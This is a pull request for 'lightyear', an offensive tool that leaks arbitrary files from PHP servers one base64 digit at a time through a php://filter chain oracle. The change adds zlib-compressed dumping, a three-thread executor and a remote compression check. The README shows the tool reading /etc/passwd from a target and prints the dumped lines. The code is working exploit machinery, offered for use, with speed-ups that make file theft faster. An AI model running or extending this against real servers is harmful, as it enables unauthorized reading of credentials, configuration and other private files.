### PR TITLE
Implement compression support, better output, multithreading

### DIFF
--- a/README.md
+++ b/README.md
@@ -16,15 +16,30 @@ $ cd lightyear
 $ pip install -r requirements.txt
 ```
 
-## Running
+To use, implement the `Remote.oracle()` method, and then test that it works properly by running `./lightyear.py test`.
 
 ```bash
-$ code remote.py # edit Remote.oracle
-$ ./lightyear.py test # test that your implementation works
+$ ./lightyear test # test that your implementation works
+```
+
+If it does, you are good to go.
+
+
+## Dumping files
+
+The `test` command will tell you if the remote server supports compression. If it does, use `-c` to drastically speed up the file dump.
+
+```bash
+$ ./lightyear.py -c /etc/passwd # dump a file with compression!
+```
+
+Otherwise, dump the file without compression (slower):
+
+```bash
 $ ./lightyear.py /etc/passwd # dump a file!
 ```
 
-To use, implement the `Remote.oracle()` method, and then test that it works properly by running `./lightyear.py test`.
+By default, lightyear uses *3* threads to speed up the file dump. Due to the way the algorithm works, it is generally useless to use more. You can however use less using ``--threads``.
 
 ## Resuming
 
@@ -37,19 +52,29 @@ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
 sys:x:3:3:sys:/dev:/usr/sbin/nologin
 sync:x:4:65534:sync:/bin:/bin/sync
-games:x:58
-[-] Execution interrupted (Ctrl-C) <----- PRESSED CTRL-C
-[+] Dumped /etc/passwd to /tmp/z (got 198 bytes)
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:
+<PRESSED CTRL-C>
+>> Dumped /etc/passwd to /tmp/passwd.txt (got 243 digits, 390 bytes, 390 chars) (interrupted)
 $ ./lightyear.py /etc/passwd -o /tmp/passwd.txt
-[!] File exists, resuming dump at digit #265
+[*] File exists, resuming dump at digit #243
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
 ...
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
 _apt:x:42:65534::/nonexistent:/usr/sbin/nologin
 nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
->=
-[+] Dumped /etc/passwd to /tmp/passwd.txt (got 840 bytes)
+
+>> Dumped /etc/passwd to /tmp/passwd.txt (got 413 digits, 839 bytes, 839 chars)
 ```
 
 
@@ -65,7 +90,6 @@ $ ./lightyear.py /etc/passwd
 
 # Improvements
 
-- Concurrency
 - Improve jump caching to truly reach minimum size and compute faster
 - Combine with [wrapwrap](https://github.com/ambionics/wrapwrap)
 

--- a/lightyear.py
+++ b/lightyear.py
@@ -63,7 +63,7 @@ B64DE = (
     "compress",
     "If set, the file is retrieved in a compressed format, which is then decompressed before being dumped. This is faster, but it requires PHP to have the `zlib` extension enabled, and it displays data in chunks instead of character by character.",
 )
-@arg("workers", "Number of workers. Defaults to 2.")
+@arg("threads", "Number of threads. Defaults to 3.")
 @arg("silent", "If set, do not display the file as it is being dumped")
 @arg("debug", "If set, writes logs to debug.log")
 class Exploit:
@@ -86,12 +86,12 @@ class Exploit:
         path: str,
         output: str = None,
         compress: bool = False,
-        workers: int=2, silent: bool = False,
+        threads: int=3, silent: bool = False,
         debug: bool = False,
     ) -> None:
         self.path = path
         self.output = output
-        self.nb_workers = workers
+        self.nb_threads = threads
         self.debug = debug
         if compress:
             self.data_handler = ZlibCompressedDataHandler(self)
@@ -264,7 +264,7 @@ class Exploit:
         interrupted = False
         
         try:            
-            with ThreadPoolExecutor(max_workers=self.nb_workers) as executor:
+            with ThreadPoolExecutor(max_workers=self.nb_threads) as executor:
                 futures = {}
                 
                 def queue_digit(i):

--- a/lightyear.py
+++ b/lightyear.py
@@ -112,9 +112,9 @@ class Exploit:
 
         if not data:
             return
-        
+
         msg_info(f"File exists, resuming dump at digit [b]#{len(data)}[/]")
-        
+
         for digit in data:
             self.digits.append(PositionalDigit(len(self.digits), digit))
 
@@ -186,7 +186,9 @@ class Exploit:
         # will yield a few bytes. The additional base64-encode is to ensure that
         # the output is ASCII, and we don't encounter unexpected issues with decoding or
         # anything.
-        should_be_true = self.remote.has_contents(("zlib.deflate", "convert.base64-encode"), "data:,")
+        should_be_true = self.remote.has_contents(
+            ("zlib.deflate", "convert.base64-encode"), "data:,"
+        )
 
         if not should_be_true:
             msg_warning(
@@ -926,21 +928,22 @@ class RawDataHandler(DataHandler):
         elif data.endswith("="):
             data = data[:-2]
         return data
-    
+
 
 @dataclass
 class ZlibCompressedDataHandler(DataHandler):
     GZ_B64_EXT = ".gz.b64"
-    
+
     def edit_filters(self, filters: tuple[str]) -> tuple[str]:
         return ("zlib.deflate",) + filters
 
     def for_output(self, data: str) -> bytes:
         if self.exploit.output:
             Path(self.exploit.output + self.GZ_B64_EXT).write_text(data)
+
         remove_offset = len(data) - (len(data) % 4)
         data = data[:remove_offset]
-        
+
         data = base64.decode(data)
         obj = zlib.decompressobj(-zlib.MAX_WBITS)
         try:
@@ -952,11 +955,12 @@ class ZlibCompressedDataHandler(DataHandler):
 
     def for_display(self, data: str) -> str:
         return self.for_output(data).decode("utf-8", "replace")
-    
+
     def resume(self, path: str) -> str:
         data = Path(path + self.GZ_B64_EXT).read_text()
         return data
-    
+
+
 def fc(filters: list[str]) -> str:
     return "|".join(filters)
 

--- a/lightyear.py
+++ b/lightyear.py
@@ -11,9 +11,11 @@ To use, implement the `Remote.oracle()` method in `remote.py`.
 """
 
 from __future__ import annotations
+from abc import abstractmethod
 from functools import cache, cached_property
 from itertools import product
 from dataclasses import dataclass, field
+import zlib
 
 from rich.live import Live
 from rich.text import Text
@@ -56,6 +58,10 @@ B64DE = (
     "output",
     "Path to the output file. If not set, the file is not stored. If set, and the file already exists, the dump will resume from where it stopped.",
 )
+@arg(
+    "compress",
+    "If set, the file is retrieved in a compressed format, which is then decompressed before being dumped. This is faster, but it requires PHP to have the `zlib` extension enabled, and it displays data in chunks instead of character by character.",
+)
 @arg("silent", "If set, do not display the file as it is being dumped")
 @arg("debug", "If set, writes logs to debug.log")
 class Exploit:
@@ -70,13 +76,23 @@ class Exploit:
         "convert.base64-encode",
         REMOVE_EQUAL,
     )
+    handler: DataHandler
 
     def __init__(
-        self, path: str, output: str = None, silent: bool = False, debug: bool = False
+        self,
+        path: str,
+        output: str = None,
+        compress: bool = False,
+        silent: bool = False,
+        debug: bool = False,
     ) -> None:
         self.path = path
         self.output = output
         self.debug = debug
+        if compress:
+            self.data_handler = ZlibCompressedDataHandler(self)
+        else:
+            self.data_handler = RawDataHandler(self)
         self.remote = Remote()
         self.digits = [BaseDigit()]
         self._display = not silent
@@ -92,14 +108,13 @@ class Exploit:
         self._write_output()
 
     def _handle_resume(self) -> None:
-        data = Path(self.output).read_bytes()
-        data = base64.encode(data)
-        if data.endswith("=="):
-            data = data[:-3]
-        elif data.endswith("="):
-            data = data[:-2]
-        msg_warning(f"File exists, resuming dump at digit [b]#{len(data)}[/]")
+        data = self.data_handler.resume(self.output)
 
+        if not data:
+            return
+        
+        msg_info(f"File exists, resuming dump at digit [b]#{len(data)}[/]")
+        
         for digit in data:
             self.digits.append(PositionalDigit(len(self.digits), digit))
 
@@ -131,23 +146,20 @@ class Exploit:
         return possible_digits
 
     def oracle(self, filters: list[str]) -> bool:
+        filters = self.data_handler.edit_filters(filters)
         return self.remote.has_contents(filters, self.path)
 
-    def _nb_dumped_bytes(self) -> int:
-        return (len(self.digits) - 1) // 4 * 3
-
     def data_string(self) -> str:
-        data = self.base64_string()
-        data += "A" * (4 - len(data) % 4)
-        data = base64.decode(data)
-        data = data.decode("utf-8", "replace")
-        return data
+        base64_string = self.base64_string()
+        return self.data_handler.for_display(base64_string)
 
     def _get_renderable(self) -> Group:
-        nb_bytes = self._nb_dumped_bytes()
-        prefix = f"[black b]>>[/] [u]Dumping [b]{self.path}[/b][/] (got [i]{nb_bytes}[/i] bytes)"
+        nb_digits = len(self.digits) - 1
+        string = self.data_string()
+        nb_chars = len(string)
 
-        return Group(Text(self.data_string()), prefix.format(nb_bytes=nb_bytes))
+        prefix = f"[black b]>>[/] [u]Dumping [b]{self.path}[/b][/] (got [i]{nb_digits}[/i] digits, [i]{nb_chars}[/i] chars)"
+        return Group(Text(string), prefix)
 
     def _test_remote(self) -> None:
         """Tests that the remote class created by the user is working properly."""
@@ -167,6 +179,26 @@ class Exploit:
                 msg_info(f"This should be true: {should_be_true}")
         else:
             msg_success("The remote class is working [b]properly[/]!")
+
+        # Testing if zlib.deflate is supported by the remote server
+        # We try to compress an empty string: if zlib.deflate is not supported, the
+        # remote server will yield an error and return an empty string. If it is, it
+        # will yield a few bytes. The additional base64-encode is to ensure that
+        # the output is ASCII, and we don't encounter unexpected issues with decoding or
+        # anything.
+        should_be_true = self.remote.has_contents(("zlib.deflate", "convert.base64-encode"), "data:,")
+
+        if not should_be_true:
+            msg_warning(
+                "The remote class [b]does not support[/] zlib.deflate, which is required for "
+                "compressed dumps."
+            )
+        else:
+            msg_success(
+                "The remote class [b]supports[/] zlib.deflate, which is required for "
+                "compressed dumps."
+            )
+            msg_success("Use [code]-c[/] to enable compression.")
 
         leave()
 
@@ -209,32 +241,22 @@ class Exploit:
                 live.stop()
 
         if self._display:
-            msg_print(Text(self.data_string()))
+            data = self.data_string()
+            msg_print(Text(data))
 
         if interrupted:
             msg_failure("Execution interrupted (Ctrl-C)")
 
-        nb_bytes = self._nb_dumped_bytes()
         output = f" to [b]{self.output}[/]" if self.output else ""
-        msg_success(f"Dumped [b]{self.path}[/]{output} (got [i]{nb_bytes}[/] bytes)")
+        msg_success(f"Dumped [b]{self.path}[/]{output}")
 
     def _write_output(self) -> None:
         if not self.output:
             return
 
         data = self.base64_string()
+        data = self.data_handler.for_output(data)
 
-        match len(data) % 4:
-            case 0:
-                pass
-            case 1:
-                data += "A=="
-            case 2:
-                data += "=="
-            case 3:
-                data += "="
-
-        data = base64.decode(data)
         self._handle.seek(0)
         self._handle.write(data)
         self._handle.flush()
@@ -850,6 +872,91 @@ class BaseJumpDescription(JumpDescription):
         pass
 
 
+@dataclass
+class DataHandler:
+    exploit: Exploit
+
+    @abstractmethod
+    def edit_filters(self, filters: list[str]) -> list[str]:
+        """Adds filters to the filter chain."""
+
+    @abstractmethod
+    def for_output(self, data: str) -> bytes:
+        """Returns the data as bytes for it to be stored to a file."""
+
+    @abstractmethod
+    def for_display(self, data: str) -> str:
+        """Returns the data as a string, for it to be displayed."""
+
+    @abstractmethod
+    def resume(self, path: str) -> str:
+        """Returns the base64 digits of the data that has already been dumped."""
+
+
+@dataclass
+class RawDataHandler(DataHandler):
+    def edit_filters(self, filters: tuple[str]) -> tuple[str]:
+        return filters
+
+    def for_output(self, data: str) -> bytes:
+        match len(data) % 4:
+            case 0:
+                pass
+            case 1:
+                data += "A=="
+            case 2:
+                data += "=="
+            case 3:
+                data += "="
+
+        data = base64.decode(data)
+        return data
+
+    def for_display(self, data: str) -> str:
+        data += "A" * (4 - len(data) % 4)
+        data = base64.decode(data)
+        data = data.decode("utf-8", "replace")
+        return data
+
+    def resume(self, path: str) -> str:
+        data = Path(path).read_bytes()
+        data = base64.encode(data)
+        if data.endswith("=="):
+            data = data[:-3]
+        elif data.endswith("="):
+            data = data[:-2]
+        return data
+    
+
+@dataclass
+class ZlibCompressedDataHandler(DataHandler):
+    GZ_B64_EXT = ".gz.b64"
+    
+    def edit_filters(self, filters: tuple[str]) -> tuple[str]:
+        return ("zlib.deflate",) + filters
+
+    def for_output(self, data: str) -> bytes:
+        if self.exploit.output:
+            Path(self.exploit.output + self.GZ_B64_EXT).write_text(data)
+        remove_offset = len(data) - (len(data) % 4)
+        data = data[:remove_offset]
+        
+        data = base64.decode(data)
+        obj = zlib.decompressobj(-zlib.MAX_WBITS)
+        try:
+            data = obj.decompress(data)
+        except zlib.error as e:
+            log.error(f"Decompression error", exc_info=True)
+            data = b"<unable to decompress>"
+        return data
+
+    def for_display(self, data: str) -> str:
+        return self.for_output(data).decode("utf-8", "replace")
+    
+    def resume(self, path: str) -> str:
+        data = Path(path + self.GZ_B64_EXT).read_text()
+        return data
+    
 def fc(filters: list[str]) -> str:
     return "|".join(filters)
 


### PR DESCRIPTION
Hello!

I took a few hours to implement support for compression (zlib.deflate), multithreading (~3 threads to get the best results), and a cleaner output.

![Screenshot from 2025-06-23 00-06-00](https://github.com/user-attachments/assets/bf374082-d909-4bc2-ba60-49cfbf5375ee)


Conjointly, it brings down the time required to dump `/etc/passwd` on the test docker from ~05:30 to ~00:48, approximately a factor of 6!

The compression technique only works if the remote PHP server has the `zlib` extension installed, which is often the case. To make things easy, the `test` keyword now also checks if it is the case.

Finally, due to the nature of the algorithm, it is not useful to have more than 3 threads (the default), but one can change the number of threads using `--threads`.